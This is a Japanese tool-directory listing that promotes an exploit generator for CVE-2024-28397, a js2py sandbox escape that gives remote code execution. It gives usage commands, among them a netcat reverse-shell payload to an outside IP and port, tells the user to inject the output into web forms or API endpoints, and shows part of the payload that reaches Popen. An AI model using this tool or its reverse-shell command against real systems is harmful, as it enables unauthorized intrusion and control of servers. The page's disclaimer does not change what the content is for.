Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-28397-Js2Py-RCE-Exploit — CVE-2024-28397 用のプロフェッショナルエクスプロイト: Js2Py Sandbox Escape による Remote Code Execution (RCE) の実現。モジュール式ペイロード生成を含む。 | Kitploit
ツール/GitHubGitHub/xeloxa/cve-2024-28397-js2py-rce-exploit
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubxeloxa/cve-2024-28397-js2py-rce-exploit

CVE-2024-28397-Js2Py-RCE-Exploit

CVE-2024-28397 用のプロフェッショナルエクスプロイト: Js2Py Sandbox Escape による Remote Code Execution (RCE) の実現。モジュール式ペイロード生成を含む。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見るウェブサイト
2127ヶ月前未レビュー

テクニカルブリーフィングプレビュー

💡 深掘り: 詳細なテクニカルブリーフィング (PDF) を読むにはここをクリックしてください。

CVE-2024-28397: Js2Py サンドボックスエスケープペイロードジェネレーター

Python License CVE

CVE-2024-28397 用のプロフェッショナルなペイロードジェネレーターです。このツールは、js2py サンドボックス (バージョン 0.74 以下) をエスケープし、ターゲットシステム上で任意のコマンドを実行するように設計された悪意のある JavaScript コードを生成します。

🚨 脆弱性の詳細

  • CVE ID: CVE-2024-28397
  • 影響を受けるコンポーネント: Js2Py <= 0.74
  • 影響: Remote Code Execution (RCE) / サンドボックスエスケープ
  • メカニズム: JavaScript環境内からPythonのsubprocess.PopenクラスにアクセスするためにObject.getOwnPropertyNamesを悪用します。

🚀 使用方法

このスクリプトは、脆弱性を悪用するために必要な正確なJavaScriptペイロードを生成します。このツールを使用するためにjs2pyをインストールする必要はありません。

1. ペイロードを生成する

被害者のマシン上で実行したいコマンドを指定してスクリプトを実行します。

root@kitploit:~
# Generate payload to run 'id'
python3 exploit.py -c "id"
root@kitploit:~
# Generate payload for a Reverse Shell
python3 exploit.py -c "nc -e /bin/bash 10.10.10.10 4444"

2. ターゲットを攻撃する

ツールが生成した出力をコピーし、脆弱なアプリケーション (例: js2py によって解析されるウェブフォーム、APIエンドポイント、設定ファイル) に注入します。

注入例: ウェブサイトがユーザー入力を受け取り、js2py.eval_js(user_input) で実行する場合、生成されたコードを貼り付けると、そのサーバー上でコマンドが実行されます。

📝 例

root@kitploit:~
$ python3 exploit.py -c "whoami"

    var output = "Initial";
    try {
        var leaked_wrapper = Object.getOwnPropertyNames({});
        // ... (full malicious code) ...
        var res = Popen("whoami", ...).communicate();
        output = res;
    } ...
    output

👨‍💻 作成者

Ali Sünbül (xeloxa)

  • 📧 メール: [email protected]
  • 🌐 ウェブサイト: xeloxa.netlify.app
  • 🐙 GitHub: @xeloxa

⚠️ 免責事項

このソフトウェアは教育およびセキュリティ研究目的のみで提供されます。作者はこのコードの誤用についていかなる責任も負いません。所有していないシステムでテストする前に、明示的な許可を得てください。

ツールをダウンロード